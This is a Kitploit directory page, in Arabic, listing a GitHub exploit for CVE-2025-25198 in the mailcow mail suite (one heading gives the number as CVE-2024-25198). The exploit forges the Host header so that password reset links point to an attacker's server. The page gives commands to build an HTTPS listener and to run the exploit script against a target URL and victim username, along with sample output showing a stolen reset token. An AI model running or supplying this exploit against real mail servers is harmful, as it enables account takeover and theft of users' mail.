Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-25198 — يلتقط رموز إعادة تعيين كلمة المرور من هجمات حقن رأس المضيف في Mailcow. | Kitploit
أدوات/GitHubGitHub/enzocipher/cve-2025-25198
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

يلتقط رموز إعادة تعيين كلمة المرور من هجمات حقن رأس المضيف في Mailcow.

عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-25198

mailcow: dockerized هي مجموعة برامج جماعية/بريد إلكتروني مفتوحة المصدر مبنية على docker. قبل الإصدار 2025-01a، تسمح ثغرة أمنية في وظيفة إعادة تعيين كلمة المرور في mailcow للمهاجم بالتلاعب في Host HTTP header لتوليد رابط إعادة تعيين كلمة مرور يشير إلى نطاق يتحكم فيه المهاجم. يمكن أن يؤدي هذا إلى الاستيلاء على الحساب إذا نقر المستخدم على الرابط المسموم.

كيف تعمل؟

تقوم بإعداد خادم https لاستقبال جميع الطلبات وترسل طلب POST إلى الموقع مع ترويسة Host مع <IP> الذي اخترته. يمكنك أيضًا استخدام Burpsuite لإرسال الطلب والحصول على الرمز المميز (Token) في الخادم.

الميزات

  • خادم HTTPS يسترجع رمز تغيير كلمة المرور (Password Change Token)
  • سكربت استغلال يهاجم ثغرة الموقع.
  • تم إصلاح كل شيء ولم يعد يتطلب openssl للعمل

المتطلبات الأساسية

  • Go 1.16 أو أحدث

سكربت الخادم

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

سكربت الاستغلال

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | optional >

بعد الانتظار قليلاً، سيخرج الخادم الرمز المميز الذي يمكنك استخدامه:

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
تنزيل الأداة